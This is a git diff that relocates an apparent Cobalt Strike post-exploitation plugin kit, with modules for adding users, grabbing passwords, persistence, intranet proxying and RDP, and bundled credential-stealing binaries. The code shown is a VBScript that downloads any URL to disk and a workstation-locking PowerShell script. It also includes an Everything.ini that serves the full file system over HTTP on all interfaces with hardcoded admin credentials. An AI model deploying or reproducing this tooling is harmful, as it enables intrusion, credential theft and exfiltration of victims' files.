diff --git a/Z1.cna b/Chinese/Z1.cna similarity index 100% rename from Z1.cna rename to Chinese/Z1.cna diff --git a/modules/About.cna b/Chinese/modules/About.cna similarity index 100% rename from modules/About.cna rename to Chinese/modules/About.cna diff --git a/modules/Add user.cna b/Chinese/modules/Add user.cna similarity index 100% rename from modules/Add user.cna rename to Chinese/modules/Add user.cna diff --git a/modules/Auxiliary.cna b/Chinese/modules/Auxiliary.cna similarity index 100% rename from modules/Auxiliary.cna rename to Chinese/modules/Auxiliary.cna diff --git a/modules/Grab password.cna b/Chinese/modules/Grab password.cna similarity index 100% rename from modules/Grab password.cna rename to Chinese/modules/Grab password.cna diff --git a/modules/Information collection.cna b/Chinese/modules/Information collection.cna similarity index 100% rename from modules/Information collection.cna rename to Chinese/modules/Information collection.cna diff --git a/modules/Intranet agent.cna b/Chinese/modules/Intranet agent.cna similarity index 100% rename from modules/Intranet agent.cna rename to Chinese/modules/Intranet agent.cna diff --git a/modules/Intranet scanning.cna b/Chinese/modules/Intranet scanning.cna similarity index 100% rename from modules/Intranet scanning.cna rename to Chinese/modules/Intranet scanning.cna diff --git a/modules/Locate AD.cna b/Chinese/modules/Locate AD.cna similarity index 100% rename from modules/Locate AD.cna rename to Chinese/modules/Locate AD.cna diff --git a/modules/Permission retention.cna b/Chinese/modules/Permission retention.cna similarity index 100% rename from modules/Permission retention.cna rename to Chinese/modules/Permission retention.cna diff --git a/modules/RDP.cna b/Chinese/modules/RDP.cna similarity index 100% rename from modules/RDP.cna rename to Chinese/modules/RDP.cna diff --git a/scripts/Add user/NetUser.exe b/Chinese/scripts/Add user/NetUser.exe similarity index 100% rename from scripts/Add user/NetUser.exe rename to Chinese/scripts/Add user/NetUser.exe diff --git a/scripts/Add user/bof_net_user.o b/Chinese/scripts/Add user/bof_net_user.o old mode 100755 new mode 100644 similarity index 100% rename from scripts/Add user/bof_net_user.o rename to Chinese/scripts/Add user/bof_net_user.o diff --git a/scripts/Auxiliary/SharpOSS.exe b/Chinese/scripts/Auxiliary/SharpOSS.exe similarity index 100% rename from scripts/Auxiliary/SharpOSS.exe rename to Chinese/scripts/Auxiliary/SharpOSS.exe diff --git a/scripts/Auxiliary/SharpZip.exe b/Chinese/scripts/Auxiliary/SharpZip.exe similarity index 100% rename from scripts/Auxiliary/SharpZip.exe rename to Chinese/scripts/Auxiliary/SharpZip.exe diff --git a/scripts/Auxiliary/download.vbs b/Chinese/scripts/Auxiliary/download.vbs old mode 100755 new mode 100644 similarity index 96% rename from scripts/Auxiliary/download.vbs rename to Chinese/scripts/Auxiliary/download.vbs index bc5a446..85a7e44 --- a/scripts/Auxiliary/download.vbs +++ b/Chinese/scripts/Auxiliary/download.vbs @@ -1,67 +1,67 @@ -dim url -dim file -Set objArgs = WScript.Arguments -if objArgs.Count < 2 then - msgbox("Invalid param count! should be: url pathfilename") -Else - url = objArgs(0) - file = objArgs(1) - GetHttpResult url, "UTF-8", file -end if - - -function GetHttpResult(url, charset, file) - dim http - set http = Createobject("Msxml2.ServerXMLHTTP") - Http.setTimeouts 10000, 10000, 10000, 10000 'ÉèÖó¬Ê±Ê±¼ä - 'Sub setTimeouts(ByVal resolveTimeout As Long, ByVal connectTimeout As Long, ByVal sendTimeout As Long, ByVal receiveTimeout As Long) - - http.Open "GET", url, False - 'Sub open(ByVal bstrMethod As String, ByVal bstrUrl As String, [ByVal varAsync], [ByVal bstrUser], [ByVal bstrPassword]) - - http.Send() - - If http.readystate = 4 Then - GetHttpResult = SaveToFile(http.ResponseBody, charset, file) - End If - -end function - -Function SaveToFile(str, charset, file) - Dim objStream - Set objStream = CreateObject("Adodb.Stream") - - objStream.Type = 1 - 'Const adTypeBinary = 1 - 'Const adTypeText = 2 - - objStream.Mode = 3 - 'Const adModeRead = 1 - 'Const adModeReadWrite = 3 - 'Const adModeRecursive = 4194304 - 'Const adModeShareDenyNone = 16 - 'Const adModeShareDenyRead = 4 - 'Const adModeShareDenyWrite = 8 - 'Const adModeShareExclusive = 12 - 'Const adModeUnknown = 0 - 'Const adModeWrite = 2 - - - objStream.Open - objStream.Write str - objStream.Position = 0 - - objStream.Type = 2 - 'adTypeBinary = 1 - 'adTypeText = 2 - - objStream.Charset = charset -' BytesToStr = objStream.ReadText - - objStream.SaveToFile file, 2 - 'adSaveCreateNotExist = 1 - 'adSaveCreateOverWrite = 2 - - objStream.Close - Set objStream = Nothing +dim url +dim file +Set objArgs = WScript.Arguments +if objArgs.Count < 2 then + msgbox("Invalid param count! should be: url pathfilename") +Else + url = objArgs(0) + file = objArgs(1) + GetHttpResult url, "UTF-8", file +end if + + +function GetHttpResult(url, charset, file) + dim http + set http = Createobject("Msxml2.ServerXMLHTTP") + Http.setTimeouts 10000, 10000, 10000, 10000 'ÉèÖó¬Ê±Ê±¼ä + 'Sub setTimeouts(ByVal resolveTimeout As Long, ByVal connectTimeout As Long, ByVal sendTimeout As Long, ByVal receiveTimeout As Long) + + http.Open "GET", url, False + 'Sub open(ByVal bstrMethod As String, ByVal bstrUrl As String, [ByVal varAsync], [ByVal bstrUser], [ByVal bstrPassword]) + + http.Send() + + If http.readystate = 4 Then + GetHttpResult = SaveToFile(http.ResponseBody, charset, file) + End If + +end function + +Function SaveToFile(str, charset, file) + Dim objStream + Set objStream = CreateObject("Adodb.Stream") + + objStream.Type = 1 + 'Const adTypeBinary = 1 + 'Const adTypeText = 2 + + objStream.Mode = 3 + 'Const adModeRead = 1 + 'Const adModeReadWrite = 3 + 'Const adModeRecursive = 4194304 + 'Const adModeShareDenyNone = 16 + 'Const adModeShareDenyRead = 4 + 'Const adModeShareDenyWrite = 8 + 'Const adModeShareExclusive = 12 + 'Const adModeUnknown = 0 + 'Const adModeWrite = 2 + + + objStream.Open + objStream.Write str + objStream.Position = 0 + + objStream.Type = 2 + 'adTypeBinary = 1 + 'adTypeText = 2 + + objStream.Charset = charset +' BytesToStr = objStream.ReadText + + objStream.SaveToFile file, 2 + 'adSaveCreateNotExist = 1 + 'adSaveCreateOverWrite = 2 + + objStream.Close + Set objStream = Nothing End Function \ No newline at end of file diff --git a/scripts/Grab password/BrowserGhost.exe b/Chinese/scripts/Grab password/BrowserGhost.exe similarity index 100% rename from scripts/Grab password/BrowserGhost.exe rename to Chinese/scripts/Grab password/BrowserGhost.exe diff --git a/scripts/Grab password/CredPhisher.exe b/Chinese/scripts/Grab password/CredPhisher.exe similarity index 100% rename from scripts/Grab password/CredPhisher.exe rename to Chinese/scripts/Grab password/CredPhisher.exe diff --git a/scripts/Grab password/FakeLogonScreenToFile.exe b/Chinese/scripts/Grab password/FakeLogonScreenToFile.exe similarity index 100% rename from scripts/Grab password/FakeLogonScreenToFile.exe rename to Chinese/scripts/Grab password/FakeLogonScreenToFile.exe diff --git a/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe b/Chinese/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe similarity index 100% rename from scripts/Grab password/Net-GPPPassword_dotNET_v2.exe rename to Chinese/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe diff --git a/scripts/Grab password/SharpChromium.exe b/Chinese/scripts/Grab password/SharpChromium.exe similarity index 100% rename from scripts/Grab password/SharpChromium.exe rename to Chinese/scripts/Grab password/SharpChromium.exe diff --git a/scripts/Grab password/SharpCloud.exe b/Chinese/scripts/Grab password/SharpCloud.exe similarity index 100% rename from scripts/Grab password/SharpCloud.exe rename to Chinese/scripts/Grab password/SharpCloud.exe diff --git a/scripts/Grab password/SharpDecryptPwd.exe b/Chinese/scripts/Grab password/SharpDecryptPwd.exe similarity index 100% rename from scripts/Grab password/SharpDecryptPwd.exe rename to Chinese/scripts/Grab password/SharpDecryptPwd.exe diff --git a/scripts/Grab password/SharpDecryptPwd40.exe b/Chinese/scripts/Grab password/SharpDecryptPwd40.exe similarity index 100% rename from scripts/Grab password/SharpDecryptPwd40.exe rename to Chinese/scripts/Grab password/SharpDecryptPwd40.exe diff --git a/scripts/Grab password/SharpWifiGrabber.exe b/Chinese/scripts/Grab password/SharpWifiGrabber.exe similarity index 100% rename from scripts/Grab password/SharpWifiGrabber.exe rename to Chinese/scripts/Grab password/SharpWifiGrabber.exe diff --git a/scripts/Grab password/hack-browser-data.exe b/Chinese/scripts/Grab password/hack-browser-data.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Grab password/hack-browser-data.exe rename to Chinese/scripts/Grab password/hack-browser-data.exe diff --git a/scripts/Grab password/lock-screen.ps1 b/Chinese/scripts/Grab password/lock-screen.ps1 old mode 100755 new mode 100644 similarity index 96% rename from scripts/Grab password/lock-screen.ps1 rename to Chinese/scripts/Grab password/lock-screen.ps1 index 7983d09..acf90db --- a/scripts/Grab password/lock-screen.ps1 +++ b/Chinese/scripts/Grab password/lock-screen.ps1 @@ -1,14 +1,14 @@ -Function Lock-WorkStation { - -$signature = @" -[DllImport("user32.dll", SetLastError = true)] -public static extern bool LockWorkStation(); -"@ - -$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru - -$LockWorkStation::LockWorkStation() | Out-Null - -} - +Function Lock-WorkStation { + +$signature = @" +[DllImport("user32.dll", SetLastError = true)] +public static extern bool LockWorkStation(); +"@ + +$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru + +$LockWorkStation::LockWorkStation() | Out-Null + +} + Lock-WorkStation \ No newline at end of file diff --git a/scripts/Information collection/AdFind.exe b/Chinese/scripts/Information collection/AdFind.exe similarity index 100% rename from scripts/Information collection/AdFind.exe rename to Chinese/scripts/Information collection/AdFind.exe diff --git a/scripts/Information collection/SharpAVKB.exe b/Chinese/scripts/Information collection/SharpAVKB.exe similarity index 100% rename from scripts/Information collection/SharpAVKB.exe rename to Chinese/scripts/Information collection/SharpAVKB.exe diff --git a/scripts/Information collection/SharpChassisType.exe b/Chinese/scripts/Information collection/SharpChassisType.exe similarity index 100% rename from scripts/Information collection/SharpChassisType.exe rename to Chinese/scripts/Information collection/SharpChassisType.exe diff --git a/scripts/Information collection/SharpCheckInfo.exe b/Chinese/scripts/Information collection/SharpCheckInfo.exe similarity index 100% rename from scripts/Information collection/SharpCheckInfo.exe rename to Chinese/scripts/Information collection/SharpCheckInfo.exe diff --git a/scripts/Information collection/SharpClipHistory.exe b/Chinese/scripts/Information collection/SharpClipHistory.exe similarity index 100% rename from scripts/Information collection/SharpClipHistory.exe rename to Chinese/scripts/Information collection/SharpClipHistory.exe diff --git a/scripts/Information collection/SharpDir.exe b/Chinese/scripts/Information collection/SharpDir.exe similarity index 100% rename from scripts/Information collection/SharpDir.exe rename to Chinese/scripts/Information collection/SharpDir.exe diff --git a/scripts/Information collection/SharpEDRChecker.exe b/Chinese/scripts/Information collection/SharpEDRChecker.exe similarity index 100% rename from scripts/Information collection/SharpEDRChecker.exe rename to Chinese/scripts/Information collection/SharpEDRChecker.exe diff --git a/scripts/Information collection/SharpEventLog.exe b/Chinese/scripts/Information collection/SharpEventLog.exe similarity index 100% rename from scripts/Information collection/SharpEventLog.exe rename to Chinese/scripts/Information collection/SharpEventLog.exe diff --git a/scripts/Information collection/SharpSQLDump.exe b/Chinese/scripts/Information collection/SharpSQLDump.exe similarity index 100% rename from scripts/Information collection/SharpSQLDump.exe rename to Chinese/scripts/Information collection/SharpSQLDump.exe diff --git a/scripts/Information collection/SharpWebScan.exe b/Chinese/scripts/Information collection/SharpWebScan.exe similarity index 100% rename from scripts/Information collection/SharpWebScan.exe rename to Chinese/scripts/Information collection/SharpWebScan.exe diff --git a/scripts/Information collection/everything/Everything.exe b/Chinese/scripts/Information collection/everything/Everything.exe old mode 100755 new mode 100644 similarity index 100% rename from scripts/Information collection/everything/Everything.exe rename to Chinese/scripts/Information collection/everything/Everything.exe diff --git a/scripts/Information collection/everything/Everything.ini b/Chinese/scripts/Information collection/everything/Everything.ini old mode 100755 new mode 100644 similarity index 96% rename from scripts/Information collection/everything/Everything.ini rename to Chinese/scripts/Information collection/everything/Everything.ini index fa9ae67..883e519 --- a/scripts/Information collection/everything/Everything.ini +++ b/Chinese/scripts/Information collection/everything/Everything.ini @@ -1,737 +1,737 @@ -; Please make sure Everything is not running before modifying this file. -[Everything] -run_as_admin=1 -allow_http_server=1 -allow_etp_server=1 -window_x=198 -window_y=89 -window_wide=785 -window_high=650 -maximized=0 -minimized=0 -fullscreen=0 -ontop=0 -bring_into_view=1 -alpha=255 -match_whole_word=0 -match_path=0 -match_case=0 -match_diacritics=0 -match_regex=0 -view=0 -thumbnail_size=64 -thumbnail_fill=0 -min_thumbnail_size=32 -max_thumbnail_size=256 -medium_thumbnail_size=64 -large_thumbnail_size=128 -extra_large_thumbnail_size=256 -thumbnail_load_size=0 -thumbnail_overlay_icon=1 -shell_max_path=0 -allow_multiple_windows=0 -allow_multiple_instances=0 -run_in_background=1 -show_in_taskbar=1 -show_tray_icon=1 -minimize_to_tray=0 -toggle_window_from_tray_icon=0 -alternate_row_color=0 -show_mouseover=0 -check_for_updates_on_startup=0 -beta_updates=0 -show_highlighted_search_terms=1 -text_size=0 -hide_empty_search_results=0 -clear_selection_on_search=1 -show_focus_on_search=0 -new_window_key=0 -show_window_key=0 -toggle_window_key=0 -language=0 -show_selected_item_in_statusbar=1 -statusbar_selected_item_format= -show_size_in_statusbar=0 -statusbar_size_format=0 -open_folder_command2= -open_file_command2= -open_path_command2= -explore_command2= -explore_path_command2= -window_title_format= -taskbar_notification_title_format= -instance_name= -translucent_selection_rectangle_alpha=70 -min_zoom=-6 -max_zoom=27 -context_menu_type=0 -context_menu_shell_extensions=1 -auto_include_fixed_volumes=1 -auto_include_removable_volumes=0 -auto_remove_offline_ntfs_volumes=1 -auto_remove_moved_ntfs_volumes=1 -auto_include_fixed_refs_volumes=1 -auto_include_removable_refs_volumes=0 -auto_remove_offline_refs_volumes=1 -auto_remove_moved_refs_volumes=1 -find_mount_points_on_removable_volumes=0 -last_export_type=0 -max_threads=0 -reuse_threads=1 -find_subfolders_and_files_max_threads=0 -single_parent_context_menu=0 -auto_size_1=512 -auto_size_2=640 -auto_size_3=768 -auto_size_aspect_ratio_x=9 -auto_size_aspect_ratio_y=7 -auto_size_width_only=0 -auto_size_path_x=1 -auto_size_path_y=2 -sticky_vscroll_bottom=1 -last_options_page=17 -draw_focus_rect=1 -date_format= -time_format= -listview_item_high=0 -single_click_open=0 -underline_icon_titles=0 -icons_only=0 -icon_shell_extensions=1 -auto_scroll_repeat_delay=250 -auto_scroll_repeat_rate=50 -open_many_files_warning_threshold=16 -set_foreground_window_attach_thread_input=0 -debug=0 -debug_log=0 -verbose=0 -lvm=1 -ipc=1 -home_match_case=0 -home_match_whole_word=0 -home_match_path=0 -home_match_diacritics=0 -home_regex=0 -home_search=1 -home_filter=0 -home_sort=0 -home_view=0 -home_index=1 -allow_multiple_windows_from_tray=0 -single_click_tray=0 -close_on_execute=0 -double_click_path=0 -update_display_after_scroll=0 -update_display_after_mask=1 -auto_scroll_view=0 -double_quote_copy_as_path=0 -snap=0 -snaplen=10 -rename_select_filepart_only=0 -rename_move_caret_to_selection_end=0 -rename_nav=0 -search_edit_move_caret_to_selection_end=0 -search_edit_drag_accept_files=0 -select_search_on_mouse_click=1 -focus_search_on_activate=0 -reset_vscroll_on_search=1 -wrap_focus=0 -load_icon_priority=0 -load_thumbnail_priority=0 -load_fileinfo_priority=0 -always_request_all_fileinfo=0 -header_high=0 -hide_on_close=0 -max_hidden_windows=0x00000000 -winmm=0 -menu_escape_amp=1 -menu_folders=0 -menu_folder_separator= -menu_items_per_column=0 -new_inherit=1 -full_row_select=0 -tray_show_command_line= -dpi=96 -ctrl_mouse_wheel_action=1 -allow_open=1 -allow_context_menu=1 -allow_delete=1 -allow_rename=1 -allow_cut=1 -allow_copy=1 -allow_paste=1 -allow_drag_drop=1 -allow_window_message_filter_dragdrop=0 -auto_column_widths=0 -hotkey_explorer_path_search=0 -get_key_name_text=1 -paste_new_line_op=0 -esc_cancel_action=1 -fast_ascii_search=1 -match_path_when_search_contains_path_separator=1 -allow_literal_operators=0 -allow_round_bracket_parenthesis=0 -expand_environment_variables=0 -search_as_you_type=1 -always_update_query_on_search_parameter_change=0 -convert_forward_slash_to_backslash=0 -match_whole_filename_when_using_wildcards=1 -operator_precedence=0 -replace_exact_trailing_star_dot_star_with_star=1 -allow_exclamation_point_not=1 -search_command_prefix= -auto_complete_search_command=1 -double_buffer=1 -search= -show_number_of_results_with_selection=0 -date_descending_first=0 -size_descending_first=0 -size_format=2 -alpha_select=0 -tooltips=1 -listview_tooltips=1 -show_detailed_listview_tooltips=1 -rtl_listview_edit=0 -force_path_ltr_order=1 -force_path_left_align=1 -date_time_order=0 -date_time_align=1 -size_align=3 -invert_layout=0 -update_layout_on_input_language_change=0 -control_shift_action=3 -change_search_rtl_reading_action=3 -invert_layout_action=3 -bookmark_remember_case=1 -bookmark_remember_wholeword=1 -bookmark_remember_path=1 -bookmark_remember_diacritic=1 -bookmark_remember_regex=1 -bookmark_remember_sort=1 -bookmark_remember_view=1 -bookmark_remember_filter=1 -bookmark_remember_index=1 -bookmark_remember_search=1 -bookmark_organize_x=0 -bookmark_organize_y=0 -bookmark_organize_wide=0 -bookmark_organize_high=0 -exclude_list_enabled=1 -exclude_hidden_files_and_folders=0 -exclude_system_files_and_folders=0 -include_only_files= -exclude_files= -db_location= -db_multi_user_filename=0 -db_compress=0 -index_size=1 -fast_size_sort=1 -index_date_created=0 -fast_date_created_sort=0 -index_date_modified=1 -fast_date_modified_sort=1 -index_date_accessed=0 -fast_date_accessed_sort=0 -index_attributes=0 -fast_attributes_sort=0 -index_folder_size=0 -fast_path_sort=1 -fast_extension_sort=0 -extended_information_cache_monitor=1 -db_update_thread_priority=-15 -index_recent_changes=1 -refs_file_id_extd_directory_info_buffer_size=0 -folder_update_thread_mode_background=0 -folder_update_rescan_asap=1 -monitor_thread_mode_background=1 -monitor_retry_delay=30000 -monitor_update_delay=1000 -monitor_pause=0 -usn_record_filter=0xffffffff -cancel_delay=0x000003e8 -allow_ntfs_open_file_by_id=1 -always_update_folder_recent_change=0 -editor_x=0 -editor_y=0 -editor_wide=0 -editor_high=0 -editor_maximized=0 -file_list_relative_paths=0 -rename_x=0 -rename_y=0 -rename_wide=0 -rename_high=0 -rename_match_case=0 -rename_regex=0 -advanced_copy_to_x=0 -advanced_copy_to_y=0 -advanced_copy_to_wide=0 -advanced_copy_to_high=0 -advanced_copy_to_match_case=0 -advanced_copy_to_regex=0 -advanced_move_to_x=0 -advanced_move_to_y=0 -advanced_move_to_wide=0 -advanced_move_to_high=0 -advanced_move_to_match_case=0 -advanced_move_to_regex=0 -advanced_search_x=0 -advanced_search_y=0 -advanced_search_wide=0 -advanced_search_high=0 -advanced_search_page_y_offset=0 -advanced_search_focus_id=0 -advanced_search_warnings=1 -max_recv_size=8388608 -display_full_path_name=0 -size_tiny=10240 -size_small=102400 -size_medium=1048576 -size_large=16777216 -size_huge=134217728 -themed_toolbar=1 -show_copy_name=2 -show_copy_path=2 -show_copy_full_name=2 -show_open_path=2 -show_explore=2 -show_explore_path=2 -copy_path_folder_append_backslash=0 -custom_verb01= -custom_verb02= -custom_verb03= -custom_verb04= -custom_verb05= -custom_verb06= -custom_verb07= -custom_verb08= -custom_verb09= -custom_verb10= -custom_verb11= -custom_verb12= -filters_visible=0 -filters_wide=128 -filters_right_align=1 -filters_tab_stop=0 -filter= -filter_everything_name= -filter_organize_x=0 -filter_organize_y=0 -filter_organize_wide=0 -filter_organize_high=0 -preview_visible=0 -preview_x=640 -preview_tab_stop=0 -preview_mag_filter=0 -preview_min_filter=0 -preview_fill=0 -show_preview_handlers_in_preview_pane=0 -preview_load_size=0 -preview_context=0x00000000 -preview_release_handler_on_clear=0 -sort=Run Count -sort_ascending=0 -always_keep_sort=0 -index=0 -index_file_list= -index_etp_server= -index_link_type=1 -status_bar_visible=1 -select_search_on_focus_mode=1 -select_search_on_set_mode=2 -search_history_enabled=0 -run_history_enabled=1 -search_history_days_to_keep=90 -run_history_days_to_keep=90 -search_history_keep_forever=1 -run_history_keep_forever=1 -search_history_always_suggest=0 -search_history_always_suggest_extend_toolbar=0 -search_history_visible_count_max=12 -search_history_always_suggest_visible_count_max=1 -search_history_show_all_max=256 -search_history_suggestion_max=256 -search_history_show_all_sort=2 -search_history_suggestion_sort=1 -search_history_show_above=0 -search_history_sort=2 -search_history_sort_ascending=0 -search_history_x=0 -search_history_y=0 -search_history_wide=0 -search_history_high=0 -search_history_column_search_wide=208 -search_history_column_search_order=0 -search_history_column_count_wide=128 -search_history_column_count_order=1 -search_history_column_date_wide=128 -search_history_column_date_order=2 -etp_server_enabled=0 -etp_server_bindings= -etp_server_port=21 -etp_server_username= -etp_server_password= -etp_server_welcome_message= -etp_server_log_file_name= -etp_server_logging_enabled=0 -etp_server_log_max_size=4194304 -etp_server_log_delta_size=524288 -etp_server_allow_file_download=1 -ftp_allow_port=1 -ftp_check_data_connection_ip=1 -http_server_enabled=1 -http_server_bindings=0.0.0.0 -http_title_format= -http_server_port=65535 -http_server_username=admin -http_server_password=admin@123 -http_server_home= -http_server_default_page= -http_server_log_file_name= -http_server_logging_enabled=0 -http_server_log_max_size=419430400 -http_server_log_delta_size=524288 -http_server_allow_file_download=1 -http_server_items_per_page=32 -http_server_show_drive_labels=0 -http_server_strings= -http_server_access_control_allow_origin= -service_pipe_name= -name_column_pos=0 -name_column_width=256 -path_column_visible=1 -path_column_pos=1 -path_column_width=256 -size_column_visible=1 -size_column_pos=2 -size_column_width=96 -extension_column_visible=0 -extension_column_pos=3 -extension_column_width=96 -type_column_visible=0 -type_column_pos=4 -type_column_width=96 -last_write_time_column_visible=1 -last_write_time_column_pos=3 -last_write_time_column_width=153 -creation_time_column_visible=0 -creation_time_column_pos=6 -creation_time_column_width=153 -date_accessed_column_visible=0 -date_accessed_column_pos=7 -date_accessed_column_width=153 -attribute_column_visible=0 -attribute_column_pos=8 -attribute_column_width=70 -date_recently_changed_column_visible=0 -date_recently_changed_column_pos=9 -date_recently_changed_column_width=153 -run_count_column_visible=0 -run_count_column_pos=10 -run_count_column_width=96 -date_run_column_visible=0 -date_run_column_pos=11 -date_run_column_width=153 -file_list_filename_column_visible=0 -file_list_filename_column_pos=12 -file_list_filename_column_width=96 -translucent_selection_rectangle_background_color= -translucent_selection_rectangle_border_color= -thumbnail_mouseover_border_color= -preview_background_color= -ntfs_volume_guids="\\\\?\\Volume{2d28957f-5c9e-11ea-88a5-806e6f6e6963}","\\\\?\\Volume{319a4f45-c20d-11ea-8074-806e6f6e6963}" -ntfs_volume_paths="C:","C:" -ntfs_volume_roots="","" -ntfs_volume_includes=1,1 -ntfs_volume_load_recent_changes=0,0 -ntfs_volume_include_onlys="","" -ntfs_volume_monitors=1,1 -refs_volume_guids= -refs_volume_paths= -refs_volume_roots= -refs_volume_includes= -refs_volume_load_recent_changes= -refs_volume_include_onlys= -refs_volume_monitors= -filelists= -filelist_monitor_changes= -folders= -folder_monitor_changes= -folder_buffer_size_list= -folder_rescan_if_full_list= -folder_update_types= -folder_update_days= -folder_update_ats= -folder_update_intervals= -folder_update_interval_types= -exclude_folders= -connect_history_hosts= -connect_history_ports= -connect_history_usernames= -connect_history_link_types= -etp_client_rewrite_patterns= -etp_client_rewrite_substitutions= -file_new_search_window_keys=334 -file_open_file_list_keys=335 -file_close_file_list_keys= -file_close_keys=343,27 -file_export_keys=339 -file_copy_full_name_to_clipboard_keys=9539 -file_copy_path_to_clipboard_keys= -file_set_run_count_keys= -file_create_shortcut_keys= -file_delete_keys=8238 -file_delete_permanently_keys=9262 -file_edit_keys= -file_open_keys=8205 -file_open_selection_and_close_everything_keys= -file_explore_path_keys= -file_open_new_keys= -file_open_path_keys=8461 -file_open_with_keys= -file_open_with_default_verb_keys= -file_play_keys= -file_preview_keys= -file_print_keys= -file_print_to_keys= -file_properties_keys=8717 -file_read_extended_information_keys=8517 -file_rename_keys=8305 -file_run_as_keys= -file_exit_keys=337 -file_copy_name_to_clipboard_keys= -file_open_selection_and_do_not_close_everything_keys= -file_open_most_run_keys= -file_open_last_run_keys= -file_custom_verb_1_keys= -file_custom_verb_2_keys= -file_custom_verb_3_keys= -file_custom_verb_4_keys= -file_custom_verb_5_keys= -file_custom_verb_6_keys= -file_custom_verb_7_keys= -file_custom_verb_8_keys= -file_custom_verb_9_keys= -file_custom_verb_10_keys= -file_custom_verb_11_keys= -file_custom_verb_12_keys= -indexes_folders_rescan_all_now_keys= -indexes_force_rebuild_keys= -edit_cut_keys=8536 -edit_copy_keys=8515,8493 -edit_paste_keys=8534,9261 -edit_select_all_keys=8513 -edit_invert_selection_keys= -edit_copy_to_folder_keys= -edit_move_to_folder_keys= -edit_advanced_advanced_copy_to_folder_keys= -edit_advanced_advanced_move_to_folder_keys= -view_filters_keys= -view_preview_keys=592 -view_status_bar_keys= -view_details_keys=1334 -view_medium_thumbnails_keys=1331 -view_large_thumbnails_keys=1330 -view_extra_large_thumbnails_keys=1329 -view_increase_thumbnail_size_keys=1467 -view_decrease_thumbnail_size_keys=1469 -view_window_size_small_keys=561 -view_window_size_medium_keys=562 -view_window_size_large_keys=563 -view_window_size_auto_fit_keys=564 -view_zoom_zoom_in_keys=443 -view_zoom_zoom_out_keys=445 -view_zoom_reset_keys=304,352 -view_go_to_back_keys=549,166 -view_go_to_forward_keys=551,167 -view_go_to_home_keys=548 -view_go_to_show_all_history_keys=1352,328 -view_sort_by_name_keys=305 -view_sort_by_path_keys=306 -view_sort_by_size_keys=307 -view_sort_by_extension_keys=308 -view_sort_by_type_keys=309 -view_sort_by_date_modified_keys=310 -view_sort_by_date_created_keys=311 -view_sort_by_attributes_keys=312 -view_sort_by_file_list_filename_keys= -view_sort_by_run_count_keys= -view_sort_by_date_run_keys= -view_sort_by_date_recently_changed_keys=313 -view_sort_by_date_accessed_keys= -view_sort_by_ascending_keys= -view_sort_by_descending_keys= -view_refresh_keys=116 -view_fullscreen_keys=122 -view_toggle_ltrrtl_direction_keys= -view_on_top_never_keys= -view_on_top_always_keys= -view_on_top_while_searching_keys= -search_match_case_keys=329 -search_match_whole_word_keys=322 -search_match_path_keys=341 -search_match_diacritics_keys=333 -search_enable_regex_keys=338 -search_advanced_search_keys= -search_add_to_filters_keys= -search_organize_filters_keys=1350 -bookmarks_add_to_bookmarks_keys=324 -bookmarks_organize_bookmarks_keys=1346 -tools_options_keys=336 -tools_console_keys=448 -tools_file_list_editor_keys= -tools_connect_to_etp_server_keys= -tools_disconnect_from_etp_server_keys= -help_everything_help_keys=112 -help_search_syntax_keys= -help_regex_syntax_keys= -help_command_line_options_keys= -help_everything_website_keys= -help_check_for_updates_keys= -help_about_everything_keys=368 -help_donate_keys= -search_edit_focus_search_edit_keys=326,114,580 -search_edit_delete_previous_word_keys=4360 -search_edit_auto_complete_search_keys=4384 -search_edit_show_search_history_keys= -search_edit_show_all_search_history_keys=4646,4648 -result_list_item_up_keys=8230,4134 -result_list_item_down_keys=8232,4136 -result_list_page_up_keys=8225,4129 -result_list_page_down_keys=8226,4130 -result_list_start_of_list_keys=8228 -result_list_end_of_list_keys=8227 -result_list_item_up_extend_keys=9254,5158 -result_list_item_down_extend_keys=9256,5160 -result_list_page_up_extend_keys=9249,5153 -result_list_page_down_extend_keys=9250,5154 -result_list_start_of_list_extend_keys=9252 -result_list_end_of_list_extend_keys=9251 -result_list_focus_up_keys=8486,4390 -result_list_focus_down_keys=8488,4392 -result_list_focus_page_up_keys=8481,4385 -result_list_focus_page_down_keys=8482,4386 -result_list_focus_start_of_list_keys=8484 -result_list_focus_end_of_list_keys=8483 -result_list_focus_up_extend_keys=9510,5414 -result_list_focus_down_extend_keys=9512,5416 -result_list_focus_page_up_extend_keys=9505,5409 -result_list_focus_page_down_extend_keys=9506,5410 -result_list_focus_start_of_list_extend_keys=9508 -result_list_focus_end_of_list_extend_keys=9507 -result_list_focus_result_list_keys= -result_list_focus_highest_run_count_result_keys= -result_list_focus_last_run_result_keys= -result_list_toggle_path_column_keys= -result_list_toggle_size_column_keys= -result_list_toggle_extension_column_keys= -result_list_toggle_type_column_keys= -result_list_toggle_date_modified_column_keys= -result_list_toggle_date_created_column_keys= -result_list_toggle_attributes_column_keys= -result_list_toggle_file_list_filename_column_keys= -result_list_toggle_run_count_column_keys= -result_list_toggle_date_recently_changed_column_keys= -result_list_toggle_date_accessed_column_keys= -result_list_toggle_date_run_column_keys= -result_list_size_all_columns_to_fit_keys=8555 -result_list_size_result_list_to_fit_keys= -result_list_context_menu_keys=9337 -result_list_scroll_left_or_thumbnail_left_keys=8229 -result_list_scroll_right_or_thumbnail_right_keys=8231 -result_list_scroll_page_left_or_thumbnail_focus_left_keys=8485 -result_list_scroll_page_right_or_thumbnail_focus_right_keys=8487 -result_list_left_extend_keys=9253 -result_list_right_extend_keys=9255 -result_list_focus_left_extend_keys=9509 -result_list_focus_right_extend_keys=9511 -result_list_select_focus_keys=8224 -result_list_toggle_focus_selection_keys=8480 -result_list_copy_as_csv_keys= -preview_focus_preview_keys= -result_list_font= -result_list_font_size= -search_edit_font= -search_edit_font_size= -status_bar_font= -status_bar_font_size= -header_font= -header_font_size= -normal_background_color= -normal_foreground_color= -normal_bold= -highlighted_background_color= -highlighted_foreground_color= -highlighted_bold= -current_sort_background_color= -current_sort_foreground_color= -current_sort_bold= -current_sort_highlighted_background_color= -current_sort_highlighted_foreground_color= -current_sort_highlighted_bold= -selected_background_color= -selected_foreground_color= -selected_bold= -selected_highlighted_background_color= -selected_highlighted_foreground_color= -selected_highlighted_bold= -selected_inactive_background_color= -selected_inactive_foreground_color= -selected_inactive_bold= -selected_inactive_highlighted_background_color= 